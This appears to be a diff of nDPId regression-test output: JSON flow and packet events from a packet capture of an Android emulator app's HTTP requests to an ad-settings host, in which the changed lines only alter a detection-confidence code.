+01456{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183491,"flow_last_seen":1654385183491,"flow_idle_time":7580000,"flow_min_l4_payload_len":810,"flow_max_l4_payload_len":810,"flow_tot_l4_payload_len":810,"flow_avg_l4_payload_len":810,"midstream":1,"thread_ts_msec":1654385183491,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56094,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183495,"flow_last_seen":1654385183495,"flow_idle_time":7580000,"flow_min_l4_payload_len":797,"flow_max_l4_payload_len":797,"flow_tot_l4_payload_len":797,"flow_avg_l4_payload_len":797,"midstream":1,"thread_ts_msec":1654385183495,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1654385183495,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":863,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":863,"pkt_l4_len":829,"thread_ts_msec":1654385183495,"pkt":"tKXvZygQnLbQ0+MzCABFAANRI05AAEAGCE3AqAJ+A0hFntsiAFAB9eG4XEyGo4AYAfYPUAAAAQEICnsWmm1\/RrIOR0VUIC9yZXdhcmRzZXR0aW5nP2FwcF9pZD0zMjQ1NiZzaWduPTNjMjhkZWQwNGUwZjQwOTAyMjk5Njg2MTgyNDRiNTgzJmNoYW5uZWw9JnBsYXRmb3JtPTEmb3NfdmVyc2lvbj0xMSZwYWNrYWdlX25hbWU9Y29tLnNjZW5ld2F5LmthbmthbiZhcHBfdmVyc2lvbl9uYW1lPTIuOC4yLjEmYXBwX3ZlcnNpb25fY29kZT0xNDYmb3JpZW50YXRpb249MiZtb2RlbD1zZGtfZ3Bob25lX3g4NiZicmFuZD1nb29nbGUmZ2FpZD0mbW5jPSZtY2M9Jm5ldHdvcmtfdHlwZT0xJm5ldHdvcmtfc3RyPSZsYW5ndWFnZT1lbiZ0aW1lem9uZT0mdXNlcmFnZW50PU1vemlsbGElMkY1LjAlMjAlMjhMaW51eCUzQiUyMEFuZHJvaWQlMjAxMSUzQiUyMHNka19ncGhvbmVfeDg2JTIwQnVpbGQlMkZSU1IxLjIwMTAxMy4wMDElM0IlMjB3diUyOSUyMEFwcGxlV2ViS2l0JTJGNTM3LjM2JTIwJTI4S0hUTUwlMkMlMjBsaWtlJTIwR2Vja28lMjklMjBWZXJzaW9uJTJGNC4wJTIwQ2hyb21lJTJGODMuMC40MTAzLjEwNiUyME1vYmlsZSUyMFNhZmFyaSUyRjUzNy4zNiZzZGtfdmVyc2lvbj1NQUxfOC43LjQmZ3BfdmVyc2lvbj0yMi40LjI1LTIxJTIwJTVCMCU1RCUyMCU1QlBSJTVEJTIwMzM3OTU5NDA1JnNjcmVlbl9zaXplPTE3OTR4MTA4MCZpc19jbGV2ZXI9MiBIVFRQLzEuMQ0KQ2hhcnNldDogVVRGLTgNCkhvc3Q6IHNldHRpbmcucmF5anVtcC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEFwYWNoZS1IdHRwQ2xpZW50L1VOQVZBSUxBQkxFIChqYXZhIDEuNCkNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -01443{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183495,"flow_last_seen":1654385183495,"flow_idle_time":7580000,"flow_min_l4_payload_len":797,"flow_max_l4_payload_len":797,"flow_tot_l4_payload_len":797,"flow_avg_l4_payload_len":797,"midstream":1,"thread_ts_msec":1654385183495,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56098,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +01443{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183495,"flow_last_seen":1654385183495,"flow_idle_time":7580000,"flow_min_l4_payload_len":797,"flow_max_l4_payload_len":797,"flow_tot_l4_payload_len":797,"flow_avg_l4_payload_len":797,"midstream":1,"thread_ts_msec":1654385183495,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56098,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183496,"flow_last_seen":1654385183496,"flow_idle_time":7580000,"flow_min_l4_payload_len":791,"flow_max_l4_payload_len":791,"flow_tot_l4_payload_len":791,"flow_avg_l4_payload_len":791,"midstream":1,"thread_ts_msec":1654385183496,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1654385183496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":857,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":857,"pkt_l4_len":823,"thread_ts_msec":1654385183496,"pkt":"tKXvZygQnLbQ0+MzCABFAANLU0dAAEAG2FnAqAJ+A0hFntsgAFBFVF+4FRsrIoAYAfYPSgAAAQEICnsWmm1\/RrIOR0VUIC9zZXR0aW5nP2FwcF9pZD0zMjQ1NiZzaWduPTNjMjhkZWQwNGUwZjQwOTAyMjk5Njg2MTgyNDRiNTgzJmNoYW5uZWw9JnBsYXRmb3JtPTEmb3NfdmVyc2lvbj0xMSZwYWNrYWdlX25hbWU9Y29tLnNjZW5ld2F5LmthbmthbiZhcHBfdmVyc2lvbl9uYW1lPTIuOC4yLjEmYXBwX3ZlcnNpb25fY29kZT0xNDYmb3JpZW50YXRpb249MiZtb2RlbD1zZGtfZ3Bob25lX3g4NiZicmFuZD1nb29nbGUmZ2FpZD0mbW5jPSZtY2M9Jm5ldHdvcmtfdHlwZT0xJm5ldHdvcmtfc3RyPSZsYW5ndWFnZT1lbiZ0aW1lem9uZT0mdXNlcmFnZW50PU1vemlsbGElMkY1LjAlMjAlMjhMaW51eCUzQiUyMEFuZHJvaWQlMjAxMSUzQiUyMHNka19ncGhvbmVfeDg2JTIwQnVpbGQlMkZSU1IxLjIwMTAxMy4wMDElM0IlMjB3diUyOSUyMEFwcGxlV2ViS2l0JTJGNTM3LjM2JTIwJTI4S0hUTUwlMkMlMjBsaWtlJTIwR2Vja28lMjklMjBWZXJzaW9uJTJGNC4wJTIwQ2hyb21lJTJGODMuMC40MTAzLjEwNiUyME1vYmlsZSUyMFNhZmFyaSUyRjUzNy4zNiZzZGtfdmVyc2lvbj1NQUxfOC43LjQmZ3BfdmVyc2lvbj0yMi40LjI1LTIxJTIwJTVCMCU1RCUyMCU1QlBSJTVEJTIwMzM3OTU5NDA1JnNjcmVlbl9zaXplPTE3OTR4MTA4MCZpc19jbGV2ZXI9MiBIVFRQLzEuMQ0KQ2hhcnNldDogVVRGLTgNCkhvc3Q6IHNldHRpbmcucmF5anVtcC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEFwYWNoZS1IdHRwQ2xpZW50L1VOQVZBSUxBQkxFIChqYXZhIDEuNCkNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -01437{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183496,"flow_last_seen":1654385183496,"flow_idle_time":7580000,"flow_min_l4_payload_len":791,"flow_max_l4_payload_len":791,"flow_tot_l4_payload_len":791,"flow_avg_l4_payload_len":791,"midstream":1,"thread_ts_msec":1654385183496,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/setting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +01437{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183496,"flow_last_seen":1654385183496,"flow_idle_time":7580000,"flow_min_l4_payload_len":791,"flow_max_l4_payload_len":791,"flow_tot_l4_payload_len":791,"flow_avg_l4_payload_len":791,"midstream":1,"thread_ts_msec":1654385183496,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/setting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 01008{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":2,"flow_last_seen":1654385183514,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1654385183514,"pkt":"nLbQ0+MztKXvZygQCABFAAG+fDJAAPUG+\/oDSEWewKgCfgBQ2x7n18\/a35qXuoAYAHCoswAAAQEICn9GsiV7FpppSFRUUC8xLjEgMjAwIE9LDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD11dGYtOA0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoyMyBHTVQNCkNvbnRlbnQtTGVuZ3RoOiAxOTYNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0KH4sIAAAAAAAA\/zTNwUrEQAzG8VeR75xDp+0uNmc9+AJeRJY4HddCuy2TjCJl3l1S2dtvJuGfHWpiRcGBsOgVDC0xJlUQRjEB74iyzZOaM4BD0zSExzuGf1RCXMvN8u8lrmMC4+nZE3M08OCL12TbJ7jvWn9tx6A7Hy4f86RfKV+mEdwN5xMhpx\/JI\/hth3+Gtm8Hwk0WT79O2YrMDy+WFhBk8cvgUN8JuXj41Hv4Ox6u9Q8AAP\/\/AQAA\/\/\/gj45W5wAAAA=="} 01006{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2275,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1654385183517,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1654385183517,"pkt":"nLbQ0+MztKXvZygQCABFAAG+t5xAAPUGwJADSEWewKgCfgBQ2yJcTIajAfXk1YAYAHAN9gAAAQEICn9Gsih7FpptSFRUUC8xLjEgMjAwIE9LDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD11dGYtOA0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoyMyBHTVQNCkNvbnRlbnQtTGVuZ3RoOiAxOTYNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0KH4sIAAAAAAAA\/zTNwUrEQAzG8VeR75xDp+0uNmc9+AJeRJY4HddCuy2TjCJl3l1S2dtvJuGfHWpiRcGBsOgVDC0xJlUQRjEB74iyzZOaM4BD0zSExzuGf1RCXMvN8u8lrmMC4+nZE3M08OCL12TbJ7jvWn9tx6A7Hy4f86RfKV+mEdwN5xMhpx\/JI\/hth3+Gtm8Hwk0WT79O2YrMDy+WFhBk8cvgUN8JuXj41Hv4Ox6u9Q8AAP\/\/AQAA\/\/\/gj45W5wAAAA=="} 02702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1654385183520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1706,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1706,"pkt_l4_len":1672,"thread_ts_msec":1654385183520,"pkt":"nLbQ0+MztKXvZygQCABFAAacXxNAAPUGFDwDSEWewKgCfgBQ2yAVGysiRVRiz4AYAHASmwAAAQEICn9Gsip7FpptSFRUUC8xLjEgMjAwIE9LDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD11dGYtOA0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoyMyBHTVQNCkNvbnRlbnQtTGVuZ3RoOiAxNDQxDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCh+LCAAAAAAAAP+UV12P3LYV\/SuD+yxrNF+7EwFB4aQtjCYB0tZA4qaBcEVSM1xRJE1eSTM2DPQ9RfveBkiBIkVfgj42aBv0z8SO+9S\/UJDSzm7cWLP2g\/dSPLq8PPeIc\/gUPCG1HvJFAo3fQQ6+ZUx4DwlwJIT8KSBCTq4VCWBZSA45rFfFChJARrIT96395ZhkeevZQ9kIyC+XWZYAckaQby\/WWRwpV3rIQ2Trggx6ghxefPXn55\/\/9duvP3v5zTfffv3Vf\/\/125d\/+\/vz3\/3zP7\/5w3dffPniT79\/8cWX333+2QB4+e8\/Pv\/HX0IJVEH+yachcI9pSNqHxTbrsBRjkMOPfwIJMI4ScnifHx7uuVx89M5784921Yf78vDzR7X4+ME7H\/YPfvWef\/TT\/dsRTZCvEmBVeb13VrHIEtPDMszoSrqmYIVVeIQc3jWapG4F3J5z3Q\/PcOGZk5ak0ZDDI9POeqnUTBualWLmRI+OCz7DioSbMWW81LsZ7cWsl5qb\/lamwN27yngxk3T7sSQlhrXDeEYmphE\/iphWkzsWzHBx4seh3xds3Ju\/E1v3f3YpPn7wwduRMa\/GV\/tIE1do6zFy1SkIC1xk621oDm+vRZHATpCtvj+K3K1XUUA7sjH7XkWR7YlsQUcrYt59N0hAikMcy7hgFoJBk9IXntBRa4u4TX\/0JJoB60U7BK3lQdtZAlcE+SdPgZsGZegOWpuitb5SR+FSZhpIoDKuwUA9PEtehfKr1tOdcdK8HsaMJmdUWhu2xw6nc7ZOpXtUJpR6ZnWeovWo8MxuiKdK6CfNYRrG7gZzd4ORQ1ZLvbsTuBHoWycaoQmtPMe5vJdNtuQe8so4Jl4PUrrepkxPArLpMjxLkXuhvXGpcbsJWlWdElqS7EzjAxDtAfmJOi1oqvsdU5LVaS+YMi2fVmBEorVOdEZ1YrqSHrnZmXRnlkPmyf0hv9huz7SsJZOWeGTk6jtIWqbHY\/h\/cvssJYc1tc1ZUsOiZNzjxkxDFxeL9XKbvokWV9k221y+2SuLbHW5+YFXZlOsNFKH7mlxoHPYG\/2nV3YCOEgiHqjhqBGuk0ycSb5TpkSVHpuTRM\/gzSZtTOlQ6vRwfDKBlM5ob9pQ9d1kV7doRzlNpDXI7\/bxBR64QOVDvXLiWEuRM2esn1Zn5Cf19gnqM6c9F0p2wh2DnLloTHlmR33fD01jaFOpKzO1ey2U1HXaTByF6yU5duarfKPzgJSu\/+8s+jSBq7axFH+j6wLHv1fj39G4orVS7wqGbC8KhyTi73jDwvQmRmQgX4SoK3qpOEMXfOyv2yxbsaazyGrciTgMVHbSEw6T81dmIQG9PBkVvboJ15Avoq8xVSVcrOUX16XcPLLIpN5BvlxcRGzjeX3li9YpyKOv8fl8zri+h1zfi+PU4TFwEKi+npl3y7k1jlDNF2\/Ns+18mc0Xi3l2Md\/wTXmxYuV6cymW6VXw8caK4FmXCdhycEqWBR82eivLnA7kxJB09L02ErYcHoXSngJyPrg4oQQNxqtqlYJ88SyB4N3eihni\/SB7zT9IwCo2JlahhlVkIcTladDgYYQ4Q2K0pLYtlfR74eINZPXWxSYB24fvefkw+E8nKmRkXOF7SWwfHdxy8O5BRE6QO8YuxGyuvbkjuMh9hcqLBDyL857XRfhGIIcP7r9fbNPLdA0J+Ohfhy57e5PCk3GilkOlVHQlDjxT5HlsNZ1ESKYWOqqB4iXp2hDfKqq94v765tHagqQdpD7Gr+hlfyyl498Tiuvm2NLeOPkkXDLSPTUKwvso+ZgJ1Um8reWiO03srgM1sNHaRo6BD+uGOS\/EwTopeNzHyOwygU44L40e3fkygV6UhdDdWDEk0EsWLj2LBHonHg+YjocLV\/bs2f8AAAD\/\/wEAAP\/\/Zfl4rZEOAAA="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183618,"flow_last_seen":1654385183618,"flow_idle_time":7580000,"flow_min_l4_payload_len":830,"flow_max_l4_payload_len":830,"flow_tot_l4_payload_len":830,"flow_avg_l4_payload_len":830,"midstream":1,"thread_ts_msec":1654385183618,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1654385183618,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":896,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":896,"pkt_l4_len":862,"thread_ts_msec":1654385183618,"pkt":"tKXvZygQnLbQ0+MzCABFAANyCeZAAEAGIZTAqAJ+A0hFntsoAFDk49anhCGol4AYAfYPcQAAAQEICnsWmud\/RrKJR0VUIC9yZXdhcmRzZXR0aW5nP2FwcF9pZD0zMjQ1NiZzaWduPTNjMjhkZWQwNGUwZjQwOTAyMjk5Njg2MTgyNDRiNTgzJnVuaXRfaWRzPSU1Qjg4ODElNUQmY2hhbm5lbD0mcGxhdGZvcm09MSZvc192ZXJzaW9uPTExJnBhY2thZ2VfbmFtZT1jb20uc2NlbmV3YXkua2Fua2FuJmFwcF92ZXJzaW9uX25hbWU9Mi44LjIuMSZhcHBfdmVyc2lvbl9jb2RlPTE0NiZvcmllbnRhdGlvbj0yJm1vZGVsPXNka19ncGhvbmVfeDg2JmJyYW5kPWdvb2dsZSZnYWlkPSZtbmM9Jm1jYz0mbmV0d29ya190eXBlPTEmbmV0d29ya19zdHI9Jmxhbmd1YWdlPWVuJnRpbWV6b25lPUdNVCUyQjAxJTNBMDAmdXNlcmFnZW50PU1vemlsbGElMkY1LjAlMjAlMjhMaW51eCUzQiUyMEFuZHJvaWQlMjAxMSUzQiUyMHNka19ncGhvbmVfeDg2JTIwQnVpbGQlMkZSU1IxLjIwMTAxMy4wMDElM0IlMjB3diUyOSUyMEFwcGxlV2ViS2l0JTJGNTM3LjM2JTIwJTI4S0hUTUwlMkMlMjBsaWtlJTIwR2Vja28lMjklMjBWZXJzaW9uJTJGNC4wJTIwQ2hyb21lJTJGODMuMC40MTAzLjEwNiUyME1vYmlsZSUyMFNhZmFyaSUyRjUzNy4zNiZzZGtfdmVyc2lvbj1NQUxfOC43LjQmZ3BfdmVyc2lvbj0yMi40LjI1LTIxJTIwJTVCMCU1RCUyMCU1QlBSJTVEJTIwMzM3OTU5NDA1JnNjcmVlbl9zaXplPTE3OTR4MTA4MCZpc19jbGV2ZXI9MiBIVFRQLzEuMQ0KQ2hhcnNldDogVVRGLTgNCkhvc3Q6IHNldHRpbmcucmF5anVtcC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEFwYWNoZS1IdHRwQ2xpZW50L1VOQVZBSUxBQkxFIChqYXZhIDEuNCkNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -01476{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183618,"flow_last_seen":1654385183618,"flow_idle_time":7580000,"flow_min_l4_payload_len":830,"flow_max_l4_payload_len":830,"flow_tot_l4_payload_len":830,"flow_avg_l4_payload_len":830,"midstream":1,"thread_ts_msec":1654385183618,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56104,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&unit_ids=%5B8881%5D&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +01476{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183618,"flow_last_seen":1654385183618,"flow_idle_time":7580000,"flow_min_l4_payload_len":830,"flow_max_l4_payload_len":830,"flow_tot_l4_payload_len":830,"flow_avg_l4_payload_len":830,"midstream":1,"thread_ts_msec":1654385183618,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56104,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&unit_ids=%5B8881%5D&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 